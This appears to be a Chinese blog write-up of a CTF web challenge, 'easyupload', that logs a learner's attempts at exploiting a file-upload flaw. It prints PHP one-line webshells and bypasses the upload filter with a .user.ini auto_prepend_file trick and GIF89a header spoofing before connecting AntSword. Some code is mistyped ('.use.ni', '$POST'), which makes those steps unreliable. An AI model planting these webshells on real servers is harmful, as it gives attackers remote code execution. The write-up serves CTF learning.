攻防世界--easyupload

成为ctf全栈之路之web第十题

打开题目场景得到:

猜测是利用文件上传漏洞,菜鸟一枚不太懂web知识就去看了一下wp,这里别的博主有提到php一句话木马,(虽然对本题没有作用),但我还是去看了一眼,代码如下:

<?php eval($_POST['cmd']); ?>

将这个代码写成一个php文件进行上传网页就可以做到一句话木马。关于一句话木马的解释:php一句话木马详解_笔记大全_设计学院

这里记录一个错误就是当这里的一句话木马写成了如上的样子,网页会直接发生错误跳转黑屏,实际上应该写成: 

<?php @eval($POST['cmd']); ?>

@符号的意思是不报错,即使执行错误,也不报错

还有一个不能上传文件成功的原因很离谱就是:不能使用校园网进行上传(学生党的痛) 

2023.09.16对文件上传漏洞系统的学习了一下,重新做了一遍:第一步,直接上传一句话木马:

<?php @eval($_REQUEST['a']); ?>

php文件发现网页设置了文件类型检测,修改文件后缀为jpg依然无效,第二步,尝试去burpsuite改包,将一句话木马文件上传后的cotent-type改为image/jpg,然后放包,仍然无法上传成功(burpsuite改包之后把拦截请求关了就是放包)

第三步,使用.use.ni,文件内容为GIF89a                  
auto_prepend_file=eval.jpg

GIF89a                  
auto_prepend_file=eval.jpg

然后同理第二步,上传成功之后再上传一个jpg文件(命名与上面的jpg文件保持一致否则会导致连接失败),文件内容为:(没有结尾那个v,懒得删除了)

GIF89a
<?=eval($_POST['cmd']);?>
v

然后发现可以成功上传,第五步,进行网页检查的网络页面得知网址,打开 蚁剑添加数据,密码就是上面写的cmd,然后打开文件管理选择根目录发现有一个flag文件打开得到flag:cyberpeace{0ef988dc87e576bdff7013e2a86a2d2e}

参考:攻防世界—easyupload_Len1Mi的博客-CSDN博客 

 Web-文件上传漏洞总结_kali-Myon的博客-CSDN博客

 PHP数据接收变量$_GET、$_POST 、$_REQUEST区别_木偶跳舞的博客-CSDN博客

 

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
攻防世界中,"get_post" 是一个题目,要求学习如何使用GET和POST请求来传递参数。在这个题目中,首先让我们使用GET方式传递一个名为a,值为1的变量。我们只需要在URL窗口输入"/?a=1"并回车即可。接下来,又让我们使用POST方式传递一个名为b,值为2的变量。我们可以使用一些工具来执行这个操作,比如Max Hackbar(Hackbar的替代品)。在Max Hackbar中,我们将题目的地址粘贴到第一个窗口中,在下方窗口中输入"b=2",然后点击"Execution"按钮,即可得到flag。此外,我们也可以使用Python编程代码来发送POST请求,准备要提交的数据并发送请求,然后处理响应并打印出来。以上就是攻防世界中关于"get_post"题目的解答方法。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [C#winform工具模拟getpost请求,app防攻击加密源码](https://download.csdn.net/download/xiaogxiao/9638711)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [攻防世界:get_post](https://blog.csdn.net/qq_57061511/article/details/117886323)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [【攻防世界】get_post](https://blog.csdn.net/m0_74979597/article/details/131676045)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值